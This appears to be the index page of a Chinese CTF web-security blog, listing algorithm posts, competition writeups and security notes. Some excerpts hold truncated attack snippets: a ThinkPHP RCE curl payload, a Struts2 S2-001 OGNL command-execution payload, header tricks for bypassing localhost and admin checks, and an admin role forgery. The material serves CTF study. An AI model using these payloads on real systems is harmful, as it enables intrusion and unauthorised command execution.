LENGKUR // boot sequence
[*] loading workspace: `/notes` `/wp` `/tags`
[*] mounting modules: `php` `flask` `mysql` `redis`
[*] parsing writeups and exploit notes
[OK] security knowledge base online
[OK] access granted :: welcome back
initializing terminal ui100%
root@lengkur:~$ enter blog

Lengkur

第一周算法题_寻找两个正序数组中位数
发表于|wp每周算法题
本文档原始附件已同步到博客:/pdfs/第一周算法题_寻找两个正序数组中位数.pdf。 点此下载附件
第三周算法题_两两交换链表中的节点
发表于|wp每周算法题
本文档原始附件已同步到博客:/pdfs/第三周算法题_两两交换链表中的节点.pdf。 点此下载附件
第二周算法题_Z字形变换
发表于|wp每周算法题
本文档原始附件已同步到博客:/pdfs/第二周算法题_Z字形变换.pdf。 点此下载附件
第四周算法题_最长回文字串
发表于|wp每周算法题
本文档原始附件已同步到博客:/pdfs/第四周算法题_最长回文字串.pdf。 点此下载附件
buy
发表于|wp第一场考核赛
本文档原始附件已同步到博客:/pdfs/buy.pdf。 点此下载附件
easyphp
发表于|wp第一场考核赛
本文档原始附件已同步到博客:/pdfs/easyphp.pdf。 点此下载附件
thinkphp
发表于|wp第一场考核赛
1,CVE复现,payload: 1curl http://121.43.27.97:20105/index.php?s=captcha -X POST -d _method=__construct&filter[]=system&method=get&server[...
教务系统的秘密
发表于|wp第一场考核赛
1.打开靶场,直接注册登录 2.要求admin才能查看机密信息,Chrl+U可以看到这样一个用来更新信息的函数 3.将bio改成admin并加入role字段尝试伪造admin 4.得到flag
http
发表于|notes
遇到这种情况 试这些头 “Only localhost” X-Forwarded-For: 127.0.0.1 403 Forbidden X-Original-URL: /admin SSRF题目 Host: 127.0.0.1:8080 文件上传限制 Co...
Struct2
发表于|notes
S2-001123456789101112%{//触发OGNL解析引擎#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"env"})).redirectErrorStream(tr...
avatar
Lengkur
CTF Web / Writeups / Security Notes
文章
122
标签
53
分类
22
Follow Me
公告
root@lengkur:~$ share writeups && learn security
最新文章
php命令执行
Flask
php反序列化
文件包含
SQL
分类
标签
星芒杯2026 PHAR SSRF 软件系统赛半决赛 弱比较 NSS星辰大海 furryctf UniCTF 绕过 PHP jQuery 信息搜集 .htaccess HTTP polarctf SSTI 文件包含 JavaScript session 文件上传 Redis 三届长城杯 Node.js WP Flask ciscn2026 RCE 笔记 NSSCTF WEB Unicode绕过 DASCTF SQLi ctfshow 反序列化 SHCTF NCTF 每周算法题 命令执行 Python LilacCTF 2026
归档
网站信息
文章数目 :
122
运行时间 :
本站总字数 :
68.6k
本站访客数 :
本站总浏览量 :
最后更新时间 :